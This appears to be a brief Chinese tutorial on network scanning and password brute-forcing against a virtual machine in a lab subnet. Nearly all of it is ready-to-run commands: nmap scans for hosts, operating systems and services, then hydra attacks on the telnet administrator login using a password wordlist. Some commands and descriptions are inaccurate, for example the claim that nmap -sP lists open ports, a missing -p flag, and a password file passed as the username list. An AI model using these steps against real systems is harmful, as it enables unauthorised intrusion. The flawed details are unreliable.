扫描和爆破(在相同的网段中进行)
- 开一台虚拟机桥接到真实网络中。(一般用vmnet1)
- 可以ping通baidu.com和虚拟机。
- 通过nmap的命令来查看自己想要得到。
- 社会工程学来获取有用的信息。
- 生成字典(网上找生成字典的工具)
- 用hydra(九头蛇)来暴力破解(安装hydra时需要把hydra放到盘的跟目录下然后用在cmd中指向 hydra的盘符进入hydra中)
- 暴力破解对方的密码
相对应的一些命令 (虚拟机IP 10.1.1.1 真实机IP 10.1.1.100)
ping baidu.com
ping 10.1.1.1
nmap -sP 10.1.1.1/24(查看10.1.1.1开放了那些端口号)
nmap -O 10.1.1.1(扫描目标系统版本)
nmap 21,23 10.1.1.1 -sV(查看开放了什么端口号,和端口号的版本和型号)
nmap -p 21,23 10.1.1.1 -oN e:\result.txt (扫描后把扫描结果保存到指定文件夹里)
hydra -l administrator -P e:\pass.txt 10.1.1.1 telnet
hydra -L pass.txt -P e:\pass.txt 10.1.1.1 telnet
![暴力破解](https://img-blog.csdnimg.cn/20200502172308475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzQ2NzUzMjAx,size_16,color_FFFFFF,t_70#pic_center)